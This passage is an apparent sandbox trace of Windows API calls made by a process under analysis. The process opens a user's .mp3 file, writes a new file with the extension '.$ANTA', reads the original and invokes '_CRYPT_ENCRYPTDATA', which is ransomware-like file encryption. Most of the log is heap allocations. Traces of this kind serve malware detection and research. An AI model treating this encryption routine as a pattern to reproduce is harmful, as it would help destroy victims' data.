Size=0x10) returned 0x43ca6e8 [0113.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0113.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0113.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0113.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0113.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0113.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eaa90 [0113.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0113.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0113.827] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\xavp\\WC8LUkBjI.mp3" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\xavp\\wc8lukbji.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0113.827] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.827] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ea00 | out: lpNewFilePointer=0x0) returned 1 [0113.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0113.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0113.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0113.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0113.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0113.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0113.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0113.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0113.828] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0113.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0113.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0113.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0113.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0113.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0113.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0113.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0113.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0113.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0113.828] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0113.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0113.828] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0113.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0113.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0113.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0113.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0113.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0113.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0113.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0113.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0113.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0113.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0113.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0113.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0113.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0113.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0113.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0113.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0113.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0113.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0113.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0113.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0113.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0113.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0113.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0113.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0113.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0113.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0113.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0113.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0113.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a47b0 [0113.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0113.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0113.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0113.829] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369fd8 [0113.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a47b0 | out: hHeap=0x1780000) returned 1 [0113.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0113.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0113.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0113.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0113.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0113.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0113.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0113.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0113.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0113.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0113.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a0e0 [0113.830] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\xavp\\" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\xavp")) returned 0x10 [0113.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a0e0 | out: hHeap=0x1780000) returned 1 [0113.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0113.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369fd8 | out: hHeap=0x1780000) returned 1 [0113.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0113.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0113.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0113.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0113.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0113.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0113.830] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0113.830] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\xavp\\WC8LUkBjI.mp3.$ANTA" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\xavp\\wc8lukbji.mp3.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0113.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0113.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0113.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0113.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0113.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0113.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0113.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0113.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0113.833] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0113.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0113.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0113.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0113.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0113.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0113.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0113.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0113.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0113.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0113.834] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0113.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0113.834] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0113.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0113.834] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0113.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0113.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0113.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0113.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0113.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0113.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0113.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0113.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0113.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0113.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0113.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0113.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0113.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0113.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0113.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0113.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0b020 [0113.837] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ea50 | out: lpNewFilePointer=0x0) returned 1 [0113.837] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ea78, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ea78*=0x8156, lpOverlapped=0x0) returned 1 [0113.839] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ea78, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ea78*=0x0, lpOverlapped=0x0) returned 1 [0113.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0113.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0113.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0113.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0113.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8156) returned 0x4516010 [0113.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0b020 | out: hHeap=0x1780000) returned 1 [0113.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0113.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0113.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0113.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0113.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0113.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8156) returned 0x451e170 [0113.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0113.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0113.842] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 1 [0113.842] TranslateMessage (lpMsg=0x144ee2c) returned 0 [0113.842] DispatchMessageW (lpMsg=0x144ee2c) returned 0x0 [0113.842] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0113.843] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0113.843] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0113.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0113.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0113.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0113.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0113.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0113.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8156) returned 0x4516010 [0113.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0113.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0113.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0113.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0113.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0113.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0113.843] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0113.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0113.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0113.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0113.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0113.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0113.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0113.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0113.843] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0113.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0113.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0113.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c78 [0113.843] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0113.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c78 | out: hHeap=0x1780000) returned 1 [0113.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0113.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0113.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2810 [0113.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0113.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0113.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0113.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0113.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8156) returned 0x4516010 [0113.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0113.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2770 [0113.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0113.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0113.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0113.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2730 [0113.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0113.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0113.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0113.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2910 [0113.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0113.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0113.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0113.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca988 [0113.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0113.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0113.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0113.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0113.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0113.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8156) returned 0x45262d0 [0113.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0113.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0113.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0113.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0113.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0113.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0113.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0113.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0113.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0113.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0113.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0113.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0113.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0113.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0113.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0113.845] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0113.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0113.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0113.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0113.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0113.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0113.845] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0113.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0113.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0113.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0113.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0113.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0113.846] 